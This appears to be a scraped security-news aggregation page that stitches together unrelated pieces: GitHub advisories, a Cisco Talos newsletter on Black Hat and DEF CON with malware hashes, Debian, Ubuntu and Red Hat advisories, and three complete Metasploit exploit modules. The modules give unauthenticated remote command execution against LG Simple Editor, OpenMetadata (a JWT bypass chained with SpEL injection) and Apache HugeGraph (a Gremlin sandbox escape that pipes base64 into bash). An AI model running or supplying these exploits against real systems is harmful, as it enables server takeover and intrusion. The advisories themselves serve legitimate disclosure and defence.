Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.

**SQL injection in github.com/stashapp/stash**

Critical severity GitHub Reviewed Published Aug 15, 2024 to the GitHub Advisory Database • Updated Aug 16, 2024

GHSA-75jf-52jg-qqh4: SQL injection in github.com/stashapp/stash

Insecure Permissions vulnerability in xxl-job v.2.4.1 allows a remote attacker to execute arbitrary code via the Sub-Task ID component.

**Improper Preservation of Permissions in xxl-job**

Moderate severity GitHub Reviewed Published Aug 15, 2024 to the GitHub Advisory Database • Updated Aug 15, 2024

GHSA-cpfp-m5qw-c4r3: Improper Preservation of Permissions in xxl-job

### Impact
Possible vulnerability to XSS injection if .po dictionary definition files is corrupted

### Patches
Update gettext.js to 2.0.3

### Workarounds
Make sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.


Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   Explore
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-43370

**gettext.js has a Cross-site Scripting injection**

High severity GitHub Reviewed Published Aug 15, 2024 in guillaumepotier/gettext.js • Updated Aug 15, 2024

**Package**

npm gettext.js (npm)

**Affected versions**

< 2.0.3

**Description**

**Impact**

Possible vulnerability to XSS injection if .po dictionary definition files is corrupted

**Patches**

Update gettext.js to 2.0.3

**Workarounds**

Make sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.

**References**

*   GHSA-vwhg-jwr4-vxgg

Published to the GitHub Advisory Database

Aug 15, 2024

Last updated

Aug 15, 2024

GHSA-vwhg-jwr4-vxgg: gettext.js has a Cross-site Scripting injection 

Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.”

Thursday, August 15, 2024 14:00

As promised, I’m back this week to recap some of the top stories coming out of Black Hat and DEF CON.  

Also as promised, AI was the talk of Vegas during Hacker Summer Camp (or at least from what I’ve been reading and hearing, I wasn’t there in person). 

Several exhibitions and talks at both conferences showed how easy it is to create deepfake videos and potentially use them to spread fake news and disinformation. Two security researchers worked to deepfake themselves and even managed to trick people into believing it really was them on one end of a video conference call.  

Others on the show floor had the opportunity to try their hand at creating deepfakes with the help of the Defense Advanced Research Projects Agency (DARPA). One standout example was a fake video of former Royal Family member Meghan Markle being transposed onto the face of a reporter who could then speak in an approximation of Markle’s voice to say whatever she wanted to. 

The good news is that, for now, these types of deepfakes are also incredibly easy for tools and humans alike to detect.  

For example, Adobe’s Content Authenticity Initiative is working to place labels on images to indicate that they were originally human-made, and clicking on the image would allow the user to read more information about that image’s history and where and how it had been created. 

And in the case of the Meghan Markle deepfake, the SemaFor tool on display at the DEF CON village appropriately detected the image as fake using its scoring system (it didn’t help that the deepfake creator couldn’t account for the fact that the “creator” was wearing glasses).  

Security researchers also used DEF CON and Black Hat to show where potential security pitfalls lie with the rise of AI tools and software. 

One talk centered around how Microsoft’s AI Copilot could essentially be turned into an “automated phishing machine” by leaking personal information, and other researchers warned about an over-reliance on learned language models (LLMs) to write software code that often includes vulnerabilities and errors. 

Over in the DEF CON Voting Village, security researchers found their usual swath of vulnerabilities that could be used against popular voting machines and other hardware that will likely be used in the 2024 U.S. presidential election. While we don’t have many details on the specific vulnerabilities found, Voting Village co-founder Harri Hursti told Politico the list of vulnerabilities ran “multiple pages.” 

There are a few issues that came to light for me when I was reading about this research and bug hunting: One is that there isn’t enough time to implement many of these fixes before the November election, and there are just so many different pieces of equipment and manufacturers that it’s impossible to properly inspect all these devices. I may feel compelled to write more about this later, but it’s interesting to me that we as a country have managed to decide on essentially two cell phone manufacturers that we’re willing to buy from: Apple and Google. Yet there is no standard for the types, age and vendors that we rely on for our elections, and when they’re not in use, they just sit in storage.  

**The one big thing **

This month’s Microsoft Patch Tuesday includes updates for security vulnerabilities in Office, Visual Studio, Azure, CoPilot, Teams and more. Of the six zero-day vulnerabilities Microsoft disclosed as part of its regular patching cadence, half are local privilege escalation vulnerabilities, meaning adversaries could combine them with other flaws to make their attack more serious or with higher-level privileges. Cisco Talos’ Vulnerability Research team discovered four of the vulnerabilities Microsoft patched this week: CVE-2024-38184, CVE-2024-38185, CVE-2024-38186 and CVE-2024-38187. These are elevation of privilege vulnerabilities in the Microsoft Windows kernel-mode driver that could allow an attacker to gain SYSTEM-level privileges. Talos researchers also discovered eight vulnerabilities in CLIPSP.SYS, a driver used to implement Client License System Policy on Windows 10 and 11. 

**Why do I care? **

Talos discovered three issues, TALOS-2024-1971 (CVE-2024-38062) and TALOS-2024-1970 (CVE-2024-38062) and TALOS-2024-1969 (CVE-2024-38187), an adversary could exploit by sending the targeted system a specially crafted license blob, which could lead to a denial of service. TALOS-2024-1964 (CVE-2024-38184) is exploited in the same way, but in this case, could allow the adversary to bypass the usual security checks that take place and allow them to tamper with the license. By tampering with the license, an adversary could change its properties such as when the license expires, or even create a new license that could then be used with other applications downloaded from the Windows store. Two other out-of-bounds write vulnerabilities, TALOS-2024-1966 (CVE-2024-38186) and TALOS-2024-1988 (CVE-2024-38062), could lead to privilege escalation. And in both cases, the vulnerable functions could play into a sandbox escape attack. 

Microsoft also issued a patch for a zero-day vulnerability that was already being exploited in the wild and publicly disclosed. The company warned of CVE-2024-38200 last week, which could lead to the unauthorized disclosure of sensitive information to malicious actors. 

**So now what? **

Talos released a new Snort rule set that detects attempts to exploit some of the vulnerabilities disclosed Tuesday. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63858 – 63861 and 63864 - 63878. There are also Snort 3 rules 300980 – 300988. Talos’ Vulnerability Roundup also has technical details on the eight CLIPSP.SYS vulnerabilities. 

**Top security headlines of the week **

**Secure messaging app Signal is now blocked in Venezuela and Russia, limiting a popular communication channel for activists and protestors in those countries.** In Russia, government officials have said that the app violates the country’s privacy legislation, while in Venezuela, the block comes after weeks of protests over the country’s disputed presidential election results. Signal is a popular option for users looking for encrypted messaging or hoping to avoid government censorship. The app told users that they could circumvent these blocks by turning on the app’s “censorship circumvention” settings or using a VPN to create a new account. Venezuela’s ruling party has also ordered that access to X/Twitter be restricted for 10 days, and YouTube also experienced a widespread outage in Russia that the company said was “not as a result of any technical issues on our side or action taken by us.” (The Verge, Engadget) 

**The FBI has shut down dozens of servers and the main leak site associated with the Radar ransomware group (aka Dispossessor).** Radar started out as a threat actor known for taking data stolen by the LockBit ransomware operators and offering it for sale on dark web forums, but eventually became its own self-sufficient ransomware operation. In a press release announcing the takedown over the weekend, the FBI said that Radar particularly focused on small-to-mid-sized businesses and organizations from the production, education, healthcare, financial services and transportation sectors. They identified 43 victims across the U.S., U.K., Argentina, Australia, Brazil, Canada, Poland, Germany and more. The group’s infrastructure included three servers in the U.S., three servers in the U.K., 18 servers in Germany, and eight U.S.-based domains, all of which were seized and displayed a takedown message from the FBI at the time of the takedown. (Dark Reading, Inc.) 

**The head of the U.S. Cybersecurity and Infrastructure Security Agency used her time at the Black Hat conference to call on software makers to adopt a security-by-design practice.** Jen Easterly, speaking in the keynote section of one of the largest cybersecurity conferences in the world, said that “We don’t have a cybersecurity problem, we have a software quality problem.” Easterly said many technology companies have voluntarily adopted CISA’s secure-by-design standards, which pledges to bake cybersecurity and vulnerability reviews into the design process of all new hardware and software products. “The cybersecurity industry was created to solve a problem created by another set of vendors, the technology companies and software makers. For decades tech vendors have been allowed to create insecure software,” she said. She also called on Congress to establish what she called a “liability regime” to hold companies responsible for designing insecure products and providing support to companies that due adhere to cybersecurity standards. (Inside AI Policy, CyberScoop)  

**Can’t get enough Talos? **

*   A refresher on Talos’ open-source tools and the importance of the open-source community 
*   Current attacks, targets, and other threat landscape trends 
*   As AI transforms cybersecurity, Cisco’s Martin Lee has only one piece of advice for IT managers: expect the unexpected 
*   Cisco Integrated Talos Threat Intelligence for All Splunk Users 

**Upcoming events where you can find Talos **

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**_LABScon_** **_(Sept. 18 - 21)_** 

_Scottsdale, Arizona_

**_VB2024_** **_(Oct. 2 - 4)_**

_Dublin, Ireland_

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

AI, election security headline discussions at Black Hat and DEF CON

Debian Linux Security Advisory 5749-1 - Chris Williams discovered a flaw in the handling of mounts for persistent directories in Flatpak, an application deployment framework for desktop apps. A malicious or compromised Flatpak app using persistent directories could take advantage of this flaw to access files outside of the sandbox.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5749-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 14, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : flatpak  
CVE ID         : CVE-2024-42472

Chris Williams discovered a flaw in the handling of mounts for  
persistent directories in Flatpak, an application deployment framework  
for desktop apps. A malicious or compromised Flatpak app using  
persistent directories could take advantage of this flaw to access files  
outside of the sandbox.

Details can be found in the upstream advisory at  
https://github.com/flatpak/flatpak/security/advisories/GHSA-7hgv-f2j8-xw87

For the stable distribution (bookworm), this problem has been fixed in  
version 1.14.10-1~deb12u1. To address the vulnerability, flatpak uses a  
new feature provided in bubblewrap and provided in version  
0.8.0-2+deb12u1 along with this update.

We recommend that you upgrade your flatpak packages.

For the detailed security status of flatpak please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/flatpak

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAma9F2xfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RINg/+OTenWEWdoatoO7F+184SOoVMYmmJTP2xtvuE8XC6S6NAcrYzjRQD1nyy  
xJK1IFmNjJrTf4HhfFTq2raOy60T6KRa0y71R1QS4+JOwNjdtr+zzDxdybXzg06T  
SOBKaLmped3PY4djFxoYnl9wEDLM+QAQuTWvnZugim4frEErmtlulwHRDA/qhWKT  
mzFiJgSWB7EJL61ddh2YVexru0b5rD6gyYcD7JoulbFjsOwvKyJhI4j1uuOrbNoj  
7aArjlu9D3KymGQgCc5gg8yVp5Gt/ZFYsmFJ5BdAl5a8LmTBM4mMTDIsK39mPoLo  
waxpP0bJIfCxkNB+YOyJRPdj4mtT44nwDcG/LyM+M+f+R0HUr4Apftloheb72A0q  
XUS2tRrBEs0CzToeuwkIoo2XLQt7/vQ4HFMU47gtk6ZDKqIk7hWD0zcny8x3wL+p  
/Syd2xOA/KEmbLWFRDzoVVxpmLdkbqGJn+5p5FObMjOPNOFKyMs0Q7HukwKbyPGn  
YRhg1lcmOn30MWVFol2Z1Ex74IB//Wu/az7YZ4UIId1Y734NUVXEoTLvXGKV8Hnx  
9m/0imWcz51T5DLqCv7MUX1i9V2s2R3Hj8GqQfVQTA39IH4GEmpZMR33XH/jvCDu  
p1GDW2KzIzObmLu+Kjkeg3NzRl/pKdDFiJncdNVG0PPhEn2hUY0=  
=hd0W  
-----END PGP SIGNATURE-----

Debian Security Advisory 5749-1

LG Simple Editor versions 3.21.0 and below suffer from an unauthenticated command injection vulnerability. The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',        'Description' => %q{          Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'Michael Heinzl' # MSF module        ],        'References' => [          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],          [ 'CVE', '2023-40504']        ],        'DisclosureDate' => '2023-08-04',        'Platform' => 'win',        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },              'Type' => :win_fetch,              'Payload' => {                'BadChars' => '\\'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])      ]    )  end  # Determine if the Simple Editor instance runs a vulnerable version  # copied from lg_simple_editor_rce.rb  def check    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')      }    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')    Exploit::CheckCode::Safe  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    print_status('Sending command injection...')    exec_simplerce(cmd)    print_status('Exploit finished, check thy shell.')  end  # Send command injection  def exec_simplerce(cmd)    filename = Rex::Text.rand_text_alpha(1..6)    vprint_status("Using random filename: #{filename}.mp4")    form = Rex::MIME::Message.new    form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"")    form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"')    form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"')    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'),        'ctype' => "multipart/form-data; boundary=#{form.bound}",        'data' => form.to_s      }    )    if res && res.code == 200      print_good 'Command injection sent.'    else      fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.")    end  endend

LG Simple Editor 3.21.0 Command Injection

This Metasploit module exploits OpenMetadata versions 1.2.3 and below by chaining an API authentication bypass using JWT tokens along with a SpEL injection vulnerability to achieve arbitrary command execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain',        'Description' => %q{          OpenMetadata is a unified platform for discovery, observability, and governance powered          by a central metadata repository, in-depth lineage, and seamless team collaboration.          This module chains two vulnerabilities that exist in the OpenMetadata aplication.          The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.          It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters          to make any path contain any arbitrary strings that will match the excluded endpoint condition          and therefore will be processed with no JWT validation allowing an attacker to bypass the          authentication mechanism and reach any arbitrary endpoint.          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any          authentication.          OpenMetadata versions `1.2.3` and below are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor          'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery        ],        'References' => [          ['CVE', '2024-28255'],          ['CVE', '2024-28254'],          ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'],          ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],          ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']        ],        'DisclosureDate' => '2024-03-15',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Automatic',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'rport' => 8585,          'FETCH_COMMAND' => 'WGET'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])      ]    )  end  def execute_command(cmd, _opts = {})    # list of paths that require no authentication    unauthed_paths = [      '/api/v1;v1%2Fv1%2Fusers%2Flogin',      '/api/v1;v1%2Fv1%2Fusers%2Fsignup',      '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',      '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',      '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',      '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',      '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',      '/api/v1;v1%2Fv1%2Fusers%2Frefresh',      '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',      '/api/v1;v1%2Fv1%2Fsystem%2Fversion'    ]    # $@|sh – Getting a shell environment from Runtime.exec    cmd = "sh -c $@|sh . echo #{cmd}"    cmd_b64 = Base64.strict_encode64(cmd)    spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"    unauthed_paths.shuffle!.each do |path|      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),        'method' => 'GET'      })      break if res.code == 400 && res.body.include?('EL1001E')    end  end  def check    print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    })    return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata')    # try to dectect version    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'),      'method' => 'GET'    })    return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200    # parse json response and get the version    res_json = res.get_json_document    unless res_json.blank?      version = res_json['version']      version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?    end    return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?    return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')    CheckCode::Safe("Version #{version_number}")  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    execute_command(payload.encoded)  endend

OpenMetadata 1.2.3 Authentication Bypass / SpEL Injection

This Metasploit module exploits CVE-2024-27348, a remote code execution vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve remote code execution through Gremlin, resulting in complete control over the server.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache HugeGraph Gremlin RCE',        'Description' => %q{          This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in          Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve          RCE through Gremlin, resulting in complete control over the server        },        'Author' => [          '6right', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'],          [ 'CVE', '2024-27348']        ],        'License' => MSF_LICENSE,        'Platform' => %w[unix linux],        'Privileged' => true,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [ 'Automatic Target', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-04-22',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(8080),      OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])    ])  end  def check    res = send_request_cgi({      'method' => 'GET'    })    return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res    return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200    version = res.get_json_document&.dig('version')    return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version    if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))      return CheckCode::Appears("Apache HugeGraph version detected: #{version}")    end    CheckCode::Safe("Apache HugeGraph version detected: #{version}")  end  def exploit    print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")    class_name = rand_text_alpha(4..12)    thread_name = rand_text_alpha(4..12)    command_name = rand_text_alpha(4..12)    process_builder_name = rand_text_alpha(4..12)    start_method_name = rand_text_alpha(4..12)    constructor_name = rand_text_alpha(4..12)    field_name = rand_text_alpha(4..12)    java_payload = <<~PAYLOAD      Thread #{thread_name} = Thread.currentThread();      Class #{class_name} = Class.forName(\"java.lang.Thread\");      java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");      #{field_name}.setAccessible(true);      #{field_name}.set(#{thread_name}, \"#{thread_name}\");      Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");      java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);      java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')});      Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});      java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");      #{start_method_name}.invoke(#{process_builder_name});    PAYLOAD    data = {      'gremlin' => java_payload,      'bindings' => {},      'language' => 'gremlin-groovy',      'aliases' => {}    }    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/gremlin'),      'method' => 'POST',      'ctype' => 'application/json',      'data' => data.to_json    })    print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200  endend

Apache HugeGraph Gremlin Remote Code Execution

Ubuntu Security Notice 6961-1 - It was discovered that BusyBox did not properly validate user input when performing certain arithmetic operations. If a user or automated system were tricked into processing a specially crafted file, an attacker could possibly use this issue to cause a denial of service, or execute arbitrary code. It was discovered that BusyBox incorrectly managed memory when evaluating certain awk expressions. An attacker could possibly use this issue to cause a denial of service, or execute arbitrary code. This issue only affected Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6961-1August 14, 2024busybox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in BusyBox.Software Description:- busybox: Tiny utilities for small and embedded systemsDetails:It was discovered that BusyBox did not properly validate user input whenperforming certain arithmetic operations. If a user or automated systemwere tricked into processing a specially crafted file, an attacker couldpossibly use this issue to cause a denial of service, or execute arbitrarycode. (CVE-2022-48174)It was discovered that BusyBox incorrectly managed memory when evaluatingcertain awk expressions. An attacker could possibly use this issue to causea denial of service, or execute arbitrary code. This issue only affectedUbuntu 24.04 LTS. (CVE-2023-42363, CVE-2023-42364, CVE-2023-42365)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   busybox                         1:1.36.1-6ubuntu3.1   busybox-initramfs               1:1.36.1-6ubuntu3.1   busybox-static                  1:1.36.1-6ubuntu3.1Ubuntu 22.04 LTS   busybox                         1:1.30.1-7ubuntu3.1   busybox-initramfs               1:1.30.1-7ubuntu3.1   busybox-static                  1:1.30.1-7ubuntu3.1Ubuntu 20.04 LTS   busybox                         1:1.30.1-4ubuntu6.5   busybox-initramfs               1:1.30.1-4ubuntu6.5   busybox-static                  1:1.30.1-4ubuntu6.5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6961-1   CVE-2022-48174, CVE-2023-42363, CVE-2023-42364, CVE-2023-42365Package Information:   https://launchpad.net/ubuntu/+source/busybox/1:1.36.1-6ubuntu3.1   https://launchpad.net/ubuntu/+source/busybox/1:1.30.1-7ubuntu3.1   https://launchpad.net/ubuntu/+source/busybox/1:1.30.1-4ubuntu6.5

Ubuntu Security Notice USN-6961-1

Red Hat Security Advisory 2024-5418-03 - An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5418.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bind9.16 security updateAdvisory ID:        RHSA-2024:5418-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5418Issue date:         2024-08-15Revision:           03CVE Names:          CVE-2024-1737====================================================================Summary: An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.Security Fix(es):* bind: bind9: BIND's database will be slow if a very large number of RRs exist at the same nam (CVE-2024-1737)* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)* bind: bind9: Assertion failure when serving both stale cache data and authoritative zone content (CVE-2024-4076)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1737References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2298893https://bugzilla.redhat.com/show_bug.cgi?id=2298901https://bugzilla.redhat.com/show_bug.cgi?id=2298904

Tag

#vulnerability